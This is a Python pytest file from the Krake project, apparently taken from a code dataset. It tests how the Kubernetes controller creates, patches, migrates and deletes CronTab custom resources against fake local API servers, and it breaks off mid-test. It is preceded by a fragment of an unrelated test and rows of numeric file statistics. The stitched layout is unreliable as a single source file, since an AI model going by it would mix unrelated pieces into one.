        (None, 'my_test_root', (default / 'my_test_root').resolve()),
        ('my_cli_test_root', None, (default / 'my_cli_test_root').resolve()),
        ('my_cli_test_root', 'my_test_root', (default / 'my_cli_test_root').resolve()),
        (None, '/my/full/test/root', Path('/my/full/test/root')),
        ('/my/full/cli/test/root', None, Path('/my/full/cli/test/root')),
        (
            '/my/full/cli/test/root',
            '/my/full/test/root',
            Path('/my/full/cli/test/root'),
        ),
    ]
    for cli_arg, config_arg, expected in cases:
        assert get_input_root(cli_arg, config_arg, default) == expected
| 37.16129
| 96
| 0.725694
| 186
| 1,152
| 4.145161
| 0.16129
| 0.145266
| 0.199741
| 0.299611
| 0.818418
| 0.79118
| 0.79118
| 0.754864
| 0.754864
| 0.754864
| 0
| 0
| 0.136285
| 1,152
| 30
| 97
| 38.4
| 0.774874
| 0
| 0
| 0.2
| 0
| 0
| 0.210069
| 0.076389
| 0
| 0
| 0
| 0
| 0.35
| 1
| 0.05
| false
| 0
| 0.15
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
affcaffeebd4a9242f22c3786b08500e7d011099
| 38,728
|
py
|
Python
|
krake/tests/controller/kubernetes/test_custom_resource.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | 1
|
2020-05-29T08:43:32.000Z
|
2020-05-29T08:43:32.000Z
|
krake/tests/controller/kubernetes/test_custom_resource.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | null | null | null |
krake/tests/controller/kubernetes/test_custom_resource.py
|
rak-n-rok/Krake
|
2f0d4a382b99639e2c1149ee8593a9bb589d2d3f
|
[
"Apache-2.0"
] | 1
|
2019-11-19T13:39:02.000Z
|
2019-11-19T13:39:02.000Z
|
from textwrap import dedent
import pytest
from aiohttp import web
from copy import deepcopy
import json
import pytz
import yaml
from krake.api.app import create_app
from krake.controller.kubernetes.client import InvalidCustomResourceDefinitionError
from krake.controller.kubernetes.kubernetes import ResourceDelta
from krake.data.core import resource_ref
from krake.data.kubernetes import Application, ApplicationState
from krake.controller.kubernetes import KubernetesController, KubernetesClient
from krake.client import Client
from krake.test_utils import server_endpoint
from tests.controller.kubernetes import crontab_crd, create_cron_resource
from tests.factories.fake import fake
from tests.factories.kubernetes import (
ApplicationFactory,
ClusterFactory,
make_kubeconfig,
)
# snake_case response
crontab_response = yaml.safe_load(
"""
---
api_version: stable.example.com/v1
kind: CronTab
metadata:
creation_timestamp: "2017-05-31T12:56:35Z"
generation: 1
name: cron
namespace: default
resource_version: "285"
uid: 9423255b-4600-11e7-af6a-28d2447dc82b
spec:
cron_spec: '* * * * 5'
image: cron-image
"""
)
async def test_custom_resource_cached_property_called_once(
    aiohttp_server, config, db, loop
):
    """Check that the ``customresourcedefinitions`` endpoint is called only
    once when the application contains multiple custom resources of the same
    kind but with different content (the CRD lookup is cached per kind).
    """
    # Guard flipped by the CRD handler: a second call trips the assert below.
    only_once = True
    routes = web.RouteTableDef()

    # Determine scope, version, group and plural of custom resource definition
    @routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        nonlocal only_once
        assert only_once, "Function should only be called only once"
        if only_once:
            only_once = False
        if request.match_info["name"] == "crontabs.stable.example.com":
            return web.Response(
                status=200,
                body=json.dumps(crontab_crd()),
                content_type="application/json",
            )
        return web.Response(status=404)

    # As part of the reconciliation loop started by ``controller.resource_received``,
    # the k8s controller checks if the CronTabs already exists.
    @routes.get("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
    async def _(request):
        return web.Response(status=404)

    # As part of the reconciliation, the k8s controller creates the CronTabs
    @routes.post("/apis/stable.example.com/v1/namespaces/default/crontabs")
    async def _(request):
        rd = await request.read()
        app = json.loads(rd)

        # Craft a response to be used by the Hooks: echo back the submitted
        # name/image/cronSpec on the canned snake_case response.
        resp = deepcopy(crontab_response)
        resp["metadata"]["name"] = app["metadata"]["name"]
        resp["spec"]["image"] = app["spec"]["image"]
        resp["spec"]["cron_spec"] = app["spec"]["cronSpec"]

        return web.json_response(resp)

    kubernetes_app = web.Application()
    kubernetes_app.add_routes(routes)
    kubernetes_server = await aiohttp_server(kubernetes_app)

    cluster = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    # Two CronTab resources of the same kind, with different content.
    app = ApplicationFactory(
        status__state=ApplicationState.PENDING,
        status__scheduled_to=resource_ref(cluster),
        status__is_scheduled=False,
        spec__manifest=[
            create_cron_resource("cron1", image="cron-image-1"),
            create_cron_resource("cron2", minute=10, image="cron-image-2"),
        ],
    )

    await db.put(cluster)
    await db.put(app)

    api_server = await aiohttp_server(create_app(config))

    async with Client(url=server_endpoint(api_server), loop=loop) as client:
        controller = KubernetesController(server_endpoint(api_server), worker_count=0)
        await controller.prepare(client)
        # The resource is received by the controller, which starts the reconciliation
        # loop, and updates the application in the DB accordingly.
        await controller.resource_received(app)

    stored = await db.get(
        Application, namespace=app.metadata.namespace, name=app.metadata.name
    )
    assert stored.status.last_applied_manifest == app.spec.manifest
    # The resource doesn't contain any list (therefore no special control dictionary is
    # present in last_observed_manifest), and no custom observer_schema is used
    # (therefore all fields present in spec.manifest are observed). In this specific
    # case, the last_observed_manifest should be equal to spec.manifest
    assert stored.status.last_observed_manifest == app.spec.manifest
    assert stored.status.state == ApplicationState.RUNNING
    assert stored.metadata.finalizers[-1] == "kubernetes_resources_deletion"
async def test_custom_resource_cached_property(aiohttp_server):
    """Two clusters serve two different CRDs that have the exact same name;
    the CRD cache must be per-client, so each KubernetesClient sees the CRD
    belonging to its own cluster.
    """
    crd_name = "crontabs.stable.example.com"
    cluster_a_name = "cluster_a"
    cluster_b_name = "cluster_b"

    routes_a = web.RouteTableDef()
    routes_b = web.RouteTableDef()
    routes_common = web.RouteTableDef()

    def get_crd(cluster_name):
        # CRD payload tagged with the serving cluster's name so the assertion
        # below can tell which cluster's CRD the client cached.
        return web.Response(
            status=200,
            body=json.dumps(
                {
                    "api_version": "apiextensions.k8s.io/v1beta1",
                    "kind": "CustomResourceDefinition",
                    "metadata": {"clusterName": cluster_name},
                    "spec": {
                        "group": "stable.example.com",
                        "names": {"kind": "CronTab", "plural": "crontabs"},
                        "scope": "Namespaced",
                        "versions": [
                            {"name": "v1", "served": "True", "storage": "True"}
                        ],
                    },
                }
            ),
            content_type="application/json",
        )

    # Determine scope, version, group and plural of custom resource definition
    @routes_a.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        if request.match_info["name"] == crd_name:
            return get_crd(cluster_a_name)
        return web.Response(status=404)

    @routes_b.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        if request.match_info["name"] == crd_name:
            return get_crd(cluster_b_name)
        return web.Response(status=404)

    @routes_common.get("/apis/stable.example.com/v1/namespaces/default/crontabs/cron")
    async def _(request):
        return web.Response(status=404)

    @routes_common.post("/apis/stable.example.com/v1/namespaces/default/crontabs")
    async def _(request):
        return web.Response(status=200)

    async def make_kubernetes_api(cluster):
        # Each fake cluster API serves its own CRD route plus the shared ones.
        kubernetes_app = web.Application()
        routes = routes_a if cluster == cluster_a_name else routes_b
        kubernetes_app.add_routes(routes)
        kubernetes_app.add_routes(routes_common)
        return await aiohttp_server(kubernetes_app)

    kubernetes_server_a = await make_kubernetes_api(cluster=cluster_a_name)
    kubernetes_server_b = await make_kubernetes_api(cluster=cluster_b_name)

    # Clusters use two different CRDs, but with the exact same name
    cluster_a = ClusterFactory(
        metadata__name=cluster_a_name,
        spec__kubeconfig=make_kubeconfig(kubernetes_server_a),
        spec__custom_resources=[crd_name],
    )
    cluster_b = ClusterFactory(
        metadata__name=cluster_b_name,
        spec__kubeconfig=make_kubeconfig(kubernetes_server_b),
        spec__custom_resources=[crd_name],
    )

    for cluster in cluster_a, cluster_b:
        app = ApplicationFactory(
            status__state=ApplicationState.PENDING,
            status__scheduled_to=resource_ref(cluster),
            status__is_scheduled=False,
            status__last_applied_manifest=[create_cron_resource()],
            spec__manifest=[create_cron_resource()],
            spec__observer_schema=list(
                yaml.safe_load_all(
                    dedent(
                        """
                        ---
                        apiVersion: stable.example.com/v1
                        kind: CronTab
                        metadata:
                          name: cron
                          namespace: null
                        spec:
                          cronSpec: null
                          image: null
                        """
                    )
                )
            ),
        )

        async with KubernetesClient(
            cluster.spec.kubeconfig, cluster.spec.custom_resources
        ) as kube:
            delta = ResourceDelta.calculate(app)
            for new in delta.new:
                await kube.apply(new)

            custom_resource_apis = await kube.custom_resource_apis

        # The cached CRD API must come from this client's own cluster.
        assert (
            custom_resource_apis["CronTab"].metadata.cluster_name
            == cluster.metadata.name
        )
async def test_app_custom_resource_creation(aiohttp_server, config, db, loop):
    """A PENDING application whose manifest holds a custom resource (CronTab)
    is created on the cluster and ends up RUNNING in the database.
    """
    routes = web.RouteTableDef()

    # Determine scope, version, group and plural of custom resource definition
    @routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        if request.match_info["name"] == "crontabs.stable.example.com":
            return web.Response(
                status=200,
                body=json.dumps(crontab_crd()),
                content_type="application/json",
            )
        return web.Response(status=404)

    # As part of the reconciliation loop started by ``controller.resource_received``,
    # the k8s controller checks if a CronTab named `cron` already exists.
    @routes.get("/apis/stable.example.com/v1/namespaces/default/crontabs/cron")
    async def _(request):
        return web.Response(status=404)

    # As part of the reconciliation loop started by ``controller.resource_received``,
    # the k8s controller creates the CronTab named `cron`.
    @routes.post("/apis/stable.example.com/v1/namespaces/default/crontabs")
    async def _(request):
        return web.json_response(crontab_response)

    kubernetes_app = web.Application()
    kubernetes_app.add_routes(routes)
    kubernetes_server = await aiohttp_server(kubernetes_app)

    cluster = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    app = ApplicationFactory(
        status__state=ApplicationState.PENDING,
        status__scheduled_to=resource_ref(cluster),
        status__is_scheduled=False,
        spec__manifest=[create_cron_resource()],
    )

    await db.put(cluster)
    await db.put(app)

    api_server = await aiohttp_server(create_app(config))

    async with Client(url=server_endpoint(api_server), loop=loop) as client:
        controller = KubernetesController(server_endpoint(api_server), worker_count=0)
        await controller.prepare(client)
        # The resource is received by the controller, which starts the reconciliation
        # loop, and updates the application in the DB accordingly.
        await controller.resource_received(app)

    stored = await db.get(
        Application, namespace=app.metadata.namespace, name=app.metadata.name
    )
    assert stored.status.last_applied_manifest == app.spec.manifest
    # The resource doesn't contain any list (therefore no special control dictionary is
    # present in last_observed_manifest), and no custom observer_schema is used
    # (therefore all fields present in spec.manifest are observed). In this specific
    # case, the last_observed_manifest should be equal to spec.manifest
    assert stored.status.last_observed_manifest == app.spec.manifest
    assert stored.status.state == ApplicationState.RUNNING
    assert stored.metadata.finalizers[-1] == "kubernetes_resources_deletion"
async def test_app_custom_resource_update(aiohttp_server, config, db, loop):
    """Test the update of a running application using CRD

    The Kubernetes Controller should patch the application and update the DB.
    """
    routes = web.RouteTableDef()

    # Names of the CronTabs the fake cluster saw deleted/patched.
    deleted = set()
    patched = set()

    # Determine scope, version, group and plural of custom resource definition
    @routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        if request.match_info["name"] == "crontabs.stable.example.com":
            return web.Response(
                status=200,
                body=json.dumps(crontab_crd()),
                content_type="application/json",
            )
        return web.Response(status=404)

    # As part of the reconciliation loop started by ``controller.resource_received``,
    # the k8s controller checks if the CronTabs named `cron-demo-1`, `cron-demo-2`
    # and `cron-demo-3` already exist.
    @routes.get("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
    async def _(request):
        deployments = ("cron-demo-1", "cron-demo-2", "cron-demo-3")
        if request.match_info["name"] in deployments:
            return web.Response(status=200)
        return web.Response(status=404)

    # As part of the reconciliation loop, the k8s controller patches the existing
    # CronTab which has been modified.
    @routes.patch("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
    async def _(request):
        rd = await request.read()
        app = json.loads(rd)

        # Craft a response to be used by the Hooks: echo back the submitted
        # name/image/cronSpec on the canned snake_case response.
        resp = deepcopy(crontab_response)
        resp["metadata"]["name"] = app["metadata"]["name"]
        resp["spec"]["image"] = app["spec"]["image"]
        resp["spec"]["cron_spec"] = app["spec"]["cronSpec"]

        patched.add(request.match_info["name"])
        return web.json_response(resp)

    # As part of the reconciliation loop, the k8s controller deletes the CronTabs
    # which are not present in the manifest file anymore.
    @routes.delete("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
    async def _(request):
        deleted.add(request.match_info["name"])
        return web.Response(status=200)

    kubernetes_app = web.Application()
    kubernetes_app.add_routes(routes)
    kubernetes_server = await aiohttp_server(kubernetes_app)

    cluster = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    # Observed state has three CronTabs; the desired manifest drops
    # `cron-demo-1` and changes the image of `cron-demo-3`.
    app = ApplicationFactory(
        status__state=ApplicationState.RUNNING,
        status__is_scheduled=True,
        status__running_on=resource_ref(cluster),
        status__scheduled_to=resource_ref(cluster),
        status__last_observed_manifest=[
            create_cron_resource("cron-demo-1", minute=5),
            create_cron_resource("cron-demo-2", minute=15),
            create_cron_resource("cron-demo-3", minute=35),
        ],
        spec__manifest=[
            create_cron_resource("cron-demo-2", minute=15),
            create_cron_resource("cron-demo-3", minute=35, image="cron-image:1.2"),
        ],
    )
    await db.put(cluster)
    await db.put(app)

    server = await aiohttp_server(create_app(config))

    async with Client(url=server_endpoint(server), loop=loop) as client:
        controller = KubernetesController(server_endpoint(server), worker_count=0)
        await controller.prepare(client)
        # The resource is received by the controller, which starts the reconciliation
        # loop, deletes `cron-demo-1` and updates `cron-demo-3`, and updates the
        # applications in the DB accordingly.
        await controller.resource_received(app)

    assert "cron-demo-1" in deleted
    assert "cron-demo-3" in patched

    stored = await db.get(
        Application, namespace=app.metadata.namespace, name=app.metadata.name
    )
    assert stored.status.last_applied_manifest == app.spec.manifest
    # The resource doesn't contain any list (therefore no special control dictionary is
    # present in last_observed_manifest), and no custom observer_schema is used
    # (therefore all fields present in spec.manifest are observed). In this specific
    # case, the last_observed_manifest should be equal to spec.manifest
    assert stored.status.last_observed_manifest == app.spec.manifest
    assert stored.status.state == ApplicationState.RUNNING
    assert stored.metadata.finalizers[-1] == "kubernetes_resources_deletion"
async def test_app_custom_resource_migration(aiohttp_server, config, db, loop):
    """Application was scheduled to a different cluster. The controller should
    delete objects from the old cluster and create objects on the new cluster.
    """
    routes = web.RouteTableDef()

    # Determine scope, version, group and plural of custom resource definition
    @routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        if request.match_info["name"] == "crontabs.stable.example.com":
            return web.Response(
                status=200,
                body=json.dumps(crontab_crd()),
                content_type="application/json",
            )
        return web.Response(status=404)

    # As part of the reconciliation loop started by ``controller.resource_received``,
    # the k8s controller checks if the CronTabs already exists.
    @routes.get("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
    async def _(request):
        return web.Response(status=404)

    # As part of the reconciliation, the k8s controller creates a new CronTab on the
    # target cluster
    @routes.post("/apis/stable.example.com/v1/namespaces/default/crontabs")
    async def _(request):
        rd = await request.read()
        app = json.loads(rd)

        # Craft a response to be used by the Hooks: echo back the submitted
        # name/image/cronSpec on the canned snake_case response.
        resp = deepcopy(crontab_response)
        resp["metadata"]["name"] = app["metadata"]["name"]
        resp["spec"]["image"] = app["spec"]["image"]
        resp["spec"]["cron_spec"] = app["spec"]["cronSpec"]

        request.app["created"].add(app["metadata"]["name"])
        return web.json_response(resp)

    # As part of the migration, the k8s controller deletes the CronTab on the old
    # cluster. (Handler renamed from ``delete_deployment`` — it deletes CronTabs,
    # not Deployments — for consistency with the other anonymous handlers.)
    @routes.delete("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
    async def _(request):
        request.app["deleted"].add(request.match_info["name"])
        return web.Response(status=200)

    # Fix: dropped the unused ``existing=()`` parameter (copy-paste leftover).
    async def make_kubernetes_api():
        """Spin up a fake cluster API that records created/deleted CronTab names."""
        app = web.Application()
        app["created"] = set()
        app["deleted"] = set()
        app.add_routes(routes)
        return await aiohttp_server(app)

    kubernetes_server_A = await make_kubernetes_api()
    kubernetes_server_B = await make_kubernetes_api()

    cluster_A = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server_A),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    cluster_B = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server_B),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    # Running on A ("cron1" observed there) but scheduled to B ("cron2" desired).
    app = ApplicationFactory(
        status__state=ApplicationState.RUNNING,
        status__is_scheduled=True,
        status__running_on=resource_ref(cluster_A),
        status__scheduled_to=resource_ref(cluster_B),
        status__last_observed_manifest=[create_cron_resource(name="cron1", minute=10)],
        spec__manifest=[create_cron_resource(name="cron2")],
    )
    assert resource_ref(cluster_A) in app.metadata.owners
    assert resource_ref(cluster_B) in app.metadata.owners

    await db.put(cluster_A)
    await db.put(cluster_B)
    await db.put(app)

    server = await aiohttp_server(create_app(config))

    async with Client(url=server_endpoint(server), loop=loop) as client:
        controller = KubernetesController(server_endpoint(server), worker_count=0)
        await controller.prepare(client)
        # The resource is received by the controller, which starts the reconciliation
        # loop, migrates the application and updates the DB accordingly.
        await controller.resource_received(app)

    assert "cron1" in kubernetes_server_A.app["deleted"]
    assert "cron2" in kubernetes_server_B.app["created"]

    stored = await db.get(
        Application, namespace=app.metadata.namespace, name=app.metadata.name
    )
    assert stored.status.last_applied_manifest == app.spec.manifest
    # The resource doesn't contain any list (therefore no special control dictionary is
    # present in last_observed_manifest), and no custom observer_schema is used
    # (therefore all fields present in spec.manifest are observed). In this specific
    # case, the last_observed_manifest should be equal to spec.manifest
    assert stored.status.last_observed_manifest == app.spec.manifest
    assert stored.status.state == ApplicationState.RUNNING
    assert stored.status.running_on == resource_ref(cluster_B)
    assert resource_ref(cluster_A) not in stored.metadata.owners
    assert resource_ref(cluster_B) in stored.metadata.owners
async def test_app_custom_resource_deletion(aiohttp_server, config, db, loop):
    """Test the deletion of an application based on a namespaced custom
    resource.

    The fake Kubernetes API only exposes the CRD lookup and the DELETE
    endpoint for the ``cron`` CronTab. After the controller handles the
    Application (which is already marked as deleted and carries the
    ``kubernetes_resources_deletion`` finalizer), the Application must be
    gone from the database.
    """
    kubernetes_app = web.Application()
    routes = web.RouteTableDef()

    # Determine scope, version, group and plural of the custom resource definition
    @routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        if request.match_info["name"] == "crontabs.stable.example.com":
            return web.Response(
                status=200,
                body=json.dumps(crontab_crd()),
                content_type="application/json",
            )
        return web.Response(status=404)

    # As part of the deletion, the k8s controller deletes the CronTab named
    # `cron` in the `default` namespace (the CRD above is namespaced).
    @routes.delete("/apis/stable.example.com/v1/namespaces/default/crontabs/cron")
    async def _(request):
        return web.Response(status=200)

    kubernetes_app.add_routes(routes)
    kubernetes_server = await aiohttp_server(kubernetes_app)
    cluster = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    # The Application is already marked as deleted and holds the finalizer,
    # so the controller must clean up the cluster resources and let the API
    # remove the Application from the database.
    app = ApplicationFactory(
        metadata__deleted=fake.date_time(tzinfo=pytz.utc),
        status__state=ApplicationState.RUNNING,
        status__scheduled_to=resource_ref(cluster),
        status__running_on=resource_ref(cluster),
        metadata__finalizers=["kubernetes_resources_deletion"],
        status__last_observed_manifest=[create_cron_resource()],
    )
    assert resource_ref(cluster) in app.metadata.owners
    await db.put(cluster)
    await db.put(app)
    server = await aiohttp_server(create_app(config))
    async with Client(url=server_endpoint(server), loop=loop) as client:
        controller = KubernetesController(server_endpoint(server), worker_count=0)
        await controller.prepare(client)
        await controller.resource_received(app, start_observer=False)
        # Once the finalizer has been removed, the Application should have
        # been deleted from the database.
        stored = await db.get(
            Application, namespace=app.metadata.namespace, name=app.metadata.name
        )
        assert stored is None
async def test_app_custom_resource_creation_non_ns(aiohttp_server, config, db, loop):
    """Test the creation of an application based on a non-namespaced
    (cluster-scoped) custom resource.

    The Kubernetes Controller should create the CronTab and update the DB.
    Because the CRD is created with ``namespaced=False``, the CronTab URLs
    served by the fake Kubernetes API contain no namespace segment.
    """
    routes = web.RouteTableDef()

    # Determine scope, version, group and plural of custom resource definition
    @routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        if request.match_info["name"] == "crontabs.stable.example.com":
            return web.Response(
                status=200,
                body=json.dumps(crontab_crd(namespaced=False)),
                content_type="application/json",
            )
        return web.Response(status=404)

    # As part of the reconciliation loop started by ``controller.resource_received``,
    # the k8s controller checks if a CronTab named `cron` already exists.
    # Answering 404 forces the controller to create it.
    @routes.get("/apis/stable.example.com/v1/crontabs/cron")
    async def _(request):
        return web.Response(status=404)

    # As part of the reconciliation loop started by ``controller.resource_received``,
    # the k8s controller creates the CronTab named `cron`.
    @routes.post("/apis/stable.example.com/v1/crontabs")
    async def _(request):
        return web.json_response(crontab_response)

    kubernetes_app = web.Application()
    kubernetes_app.add_routes(routes)
    kubernetes_server = await aiohttp_server(kubernetes_app)
    cluster = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    app = ApplicationFactory(
        status__state=ApplicationState.PENDING,
        status__scheduled_to=resource_ref(cluster),
        status__is_scheduled=False,
        spec__manifest=[create_cron_resource()],
    )
    await db.put(cluster)
    await db.put(app)
    api_server = await aiohttp_server(create_app(config))
    async with Client(url=server_endpoint(api_server), loop=loop) as client:
        controller = KubernetesController(server_endpoint(api_server), worker_count=0)
        await controller.prepare(client)
        # The resource is received by the controller, which starts the reconciliation
        # loop, and updates the application in the DB accordingly.
        await controller.resource_received(app)
        stored = await db.get(
            Application, namespace=app.metadata.namespace, name=app.metadata.name
        )
        assert stored.status.last_applied_manifest == app.spec.manifest
        # The resource doesn't contain any list (therefore no special control
        # dictionary is present in last_observed_manifest), and no custom
        # observer_schema is used (therefore all fields present in
        # spec.manifest are observed). In this specific case, the
        # last_observed_manifest should be equal to spec.manifest.
        assert stored.status.last_observed_manifest == app.spec.manifest
        assert stored.status.state == ApplicationState.RUNNING
        assert stored.metadata.finalizers[-1] == "kubernetes_resources_deletion"
async def test_app_custom_resource_update_non_ns(aiohttp_server, config, db, loop):
    """Test the update of a running application using a non-namespaced CRD.

    The Kubernetes Controller should patch the application and update the DB:
    ``cron-demo-1`` disappeared from the manifest and must be deleted, and
    ``cron-demo-3`` changed (new image) and must be patched.
    """
    routes = web.RouteTableDef()
    # Names of the CronTabs the fake API saw deleted / patched.
    deleted = set()
    patched = set()

    # Determine scope, version, group and plural of custom resource definition
    @routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        if request.match_info["name"] == "crontabs.stable.example.com":
            return web.Response(
                status=200,
                body=json.dumps(crontab_crd(namespaced=False)),
                content_type="application/json",
            )
        return web.Response(status=404)

    # As part of the reconciliation loop started by ``controller.resource_received``,
    # the k8s controller checks if the CronTabs named `cron-demo-1`, `cron-demo-2`
    # and `cron-demo-3` already exist.
    @routes.get("/apis/stable.example.com/v1/crontabs/{name}")
    async def _(request):
        deployments = ("cron-demo-1", "cron-demo-2", "cron-demo-3")
        if request.match_info["name"] in deployments:
            return web.Response(status=200)
        return web.Response(status=404)

    # As part of the reconciliation loop, the k8s controller patches the existing
    # CronTab which has been modified.
    @routes.patch("/apis/stable.example.com/v1/crontabs/{name}")
    async def _(request):
        rd = await request.read()
        app = json.loads(rd)
        # Craft a response to be used by the Hooks
        resp = deepcopy(crontab_response)
        resp["metadata"]["name"] = app["metadata"]["name"]
        resp["spec"]["image"] = app["spec"]["image"]
        resp["spec"]["cron_spec"] = app["spec"]["cronSpec"]
        patched.add(request.match_info["name"])
        return web.json_response(resp)

    # As part of the reconciliation loop, the k8s controller deletes the CronTabs
    # which are not present in the manifest file anymore.
    @routes.delete("/apis/stable.example.com/v1/crontabs/{name}")
    async def _(request):
        deleted.add(request.match_info["name"])
        return web.Response(status=200)

    kubernetes_app = web.Application()
    kubernetes_app.add_routes(routes)
    kubernetes_server = await aiohttp_server(kubernetes_app)
    cluster = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    # Running application: `cron-demo-1` was observed but is no longer in the
    # manifest (should be deleted); `cron-demo-3` changed image (should be
    # patched); `cron-demo-2` is unchanged.
    app = ApplicationFactory(
        status__state=ApplicationState.RUNNING,
        status__is_scheduled=True,
        status__running_on=resource_ref(cluster),
        status__scheduled_to=resource_ref(cluster),
        status__last_observed_manifest=[
            create_cron_resource("cron-demo-1", minute=5),
            create_cron_resource("cron-demo-2", minute=15),
            create_cron_resource("cron-demo-3", minute=35),
        ],
        spec__manifest=[
            create_cron_resource("cron-demo-2", minute=15),
            create_cron_resource("cron-demo-3", minute=35, image="cron-image:1.2"),
        ],
    )
    await db.put(cluster)
    await db.put(app)
    server = await aiohttp_server(create_app(config))
    async with Client(url=server_endpoint(server), loop=loop) as client:
        controller = KubernetesController(server_endpoint(server), worker_count=0)
        await controller.prepare(client)
        # The resource is received by the controller, which starts the reconciliation
        # loop, deletes `cron-demo-1` and updates `cron-demo-3`, and updates the
        # applications in the DB accordingly.
        await controller.resource_received(app)
        assert "cron-demo-1" in deleted
        assert "cron-demo-3" in patched
        stored = await db.get(
            Application, namespace=app.metadata.namespace, name=app.metadata.name
        )
        assert stored.status.last_applied_manifest == app.spec.manifest
        # The resource doesn't contain any list (therefore no special control
        # dictionary is present in last_observed_manifest), and no custom
        # observer_schema is used (therefore all fields present in
        # spec.manifest are observed). In this specific case, the
        # last_observed_manifest should be equal to spec.manifest.
        assert stored.status.last_observed_manifest == app.spec.manifest
        assert stored.status.state == ApplicationState.RUNNING
        assert stored.metadata.finalizers[-1] == "kubernetes_resources_deletion"
async def test_app_custom_resource_migration_non_ns(aiohttp_server, config, db, loop):
    """Application was scheduled to a different cluster. The controller should
    delete objects from the old cluster and create objects on the new cluster.

    Both clusters are backed by fake Kubernetes APIs which record the names of
    the CronTabs created and deleted on them, so the test can assert that
    ``cron1`` is removed from the old cluster (A) and ``cron2`` is created on
    the new one (B).
    """
    routes = web.RouteTableDef()

    # Determine scope, version, group and plural of custom resource definition
    @routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        if request.match_info["name"] == "crontabs.stable.example.com":
            return web.Response(
                status=200,
                body=json.dumps(crontab_crd(namespaced=False)),
                content_type="application/json",
            )
        return web.Response(status=404)

    # As part of the reconciliation loop started by ``controller.resource_received``,
    # the k8s controller checks if the CronTabs already exist. Answering 404
    # forces a creation on the target cluster.
    @routes.get("/apis/stable.example.com/v1/crontabs/{name}")
    async def _(request):
        return web.Response(status=404)

    # As part of the reconciliation, the k8s controller creates a new CronTab on
    # the target cluster.
    @routes.post("/apis/stable.example.com/v1/crontabs")
    async def _(request):
        rd = await request.read()
        app = json.loads(rd)
        # Craft a response to be used by the Hooks
        resp = deepcopy(crontab_response)
        resp["metadata"]["name"] = app["metadata"]["name"]
        resp["spec"]["image"] = app["spec"]["image"]
        resp["spec"]["cron_spec"] = app["spec"]["cronSpec"]
        request.app["created"].add(app["metadata"]["name"])
        return web.json_response(resp)

    # As part of the migration, the k8s controller deletes the CronTab on the
    # old cluster. (Fixed: the comment used to say "Deployment", and the
    # handler had an inconsistent name compared to its siblings.)
    @routes.delete("/apis/stable.example.com/v1/crontabs/{name}")
    async def _(request):
        request.app["deleted"].add(request.match_info["name"])
        return web.Response(status=200)

    async def make_kubernetes_api():
        """Spawn a fake Kubernetes API that records created/deleted CronTabs.

        (The previous ``existing=()`` parameter was never used and has been
        removed.)
        """
        app = web.Application()
        app["created"] = set()
        app["deleted"] = set()
        app.add_routes(routes)
        return await aiohttp_server(app)

    kubernetes_server_A = await make_kubernetes_api()
    kubernetes_server_B = await make_kubernetes_api()
    cluster_A = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server_A),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    cluster_B = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server_B),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    # Running on A, scheduled to B: the controller must migrate the workload.
    app = ApplicationFactory(
        status__state=ApplicationState.RUNNING,
        status__is_scheduled=True,
        status__running_on=resource_ref(cluster_A),
        status__scheduled_to=resource_ref(cluster_B),
        status__last_observed_manifest=[create_cron_resource(name="cron1", minute=10)],
        spec__manifest=[create_cron_resource(name="cron2")],
    )
    assert resource_ref(cluster_A) in app.metadata.owners
    assert resource_ref(cluster_B) in app.metadata.owners
    await db.put(cluster_A)
    await db.put(cluster_B)
    await db.put(app)
    server = await aiohttp_server(create_app(config))
    async with Client(url=server_endpoint(server), loop=loop) as client:
        controller = KubernetesController(server_endpoint(server), worker_count=0)
